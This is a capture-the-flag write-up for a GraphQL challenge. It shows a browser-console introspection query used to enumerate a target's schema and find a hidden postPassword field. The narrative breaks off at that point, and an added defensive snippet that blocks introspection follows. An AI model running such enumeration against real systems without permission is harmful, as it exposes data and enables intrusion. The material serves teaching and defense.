
VSL CTF 2026 Web Writeups
mrGraph

Goal

Leverage GraphQL injection to get the flag from the database.

My Solution

The new intern made a website; there must be a vulnerability. Examining the sources of the available pages, we find a route we can take advantage of: /api/graphql (visible in the /users route). To enumerate the types and fields the schema exposes, run this introspection query in the Console tab of the browser:

```javascript
// Ask the GraphQL endpoint to describe itself: every type and its field names.
fetch('/api/graphql', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    query: `
      query {
        __schema {
          types {
            name
            fields {
              name
            }
          }
        }
      }`,
  }),
})
  .then(response => response.json())
  .then(data => {
    // Pretty-print the full schema dump for inspection.
    console.log(JSON.stringify(data, null, 2));
  });
```

The result contains a really suspicious postPassword field: ...
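
The introspection query above works because the endpoint answers `__schema` requests from any client. As an added example (not part of the original writeup or the challenge's code), here is one way a server could refuse such requests before execution; the function names and the sample `users` and `search` queries are assumptions.

```javascript
// Added example (not from the writeup): reject introspection before execution.
// isIntrospectionQuery and guardGraphqlBody are hypothetical names.

// One left-to-right lexer pass: comments and strings are consumed as whole
// tokens, so "__schema" inside them is ignored and a quote inside a comment
// cannot hide a real field.
const TOKEN = /#[^\n]*|"""(?:\\"""|[\s\S])*?"""|"(?:\\.|[^"\\\n])*"|[_A-Za-z][_0-9A-Za-z]*/g;
const INTROSPECTION_FIELDS = new Set(['__schema', '__type']); // __typename stays allowed

function isIntrospectionQuery(query) {
  for (const [token] of query.matchAll(TOKEN)) {
    if (INTROSPECTION_FIELDS.has(token)) return true;
  }
  return false;
}

// rawBody is the JSON text of the POST body; batched (array) bodies are checked too.
function guardGraphqlBody(rawBody) {
  let body;
  try {
    body = JSON.parse(rawBody);
  } catch (err) {
    return { allowed: false, reason: 'invalid JSON' };
  }
  const operations = Array.isArray(body) ? body : [body];
  for (const op of operations) {
    if (!op || typeof op.query !== 'string') {
      return { allowed: false, reason: 'missing query' };
    }
    if (isIntrospectionQuery(op.query)) {
      return { allowed: false, reason: 'introspection disabled' };
    }
  }
  return { allowed: true, reason: 'ok' };
}

// Constructed sample bodies; the first is the query from the writeup.
const samples = [
  JSON.stringify({ query: 'query { __schema { types { name fields { name } } } }' }),
  JSON.stringify({ query: '{ users { id __typename } }' }),
  JSON.stringify({ query: '{ search(text: "__schema") { id } }' }),
  JSON.stringify({ query: '# """\n{ __schema { types { name } } } # """' }),
];
for (const s of samples) console.log(guardGraphqlBody(s).reason);
```

Hiding the schema only removes the map: a field such as postPassword can still be requested by name, so it also needs field-level authorization or removal from the public schema.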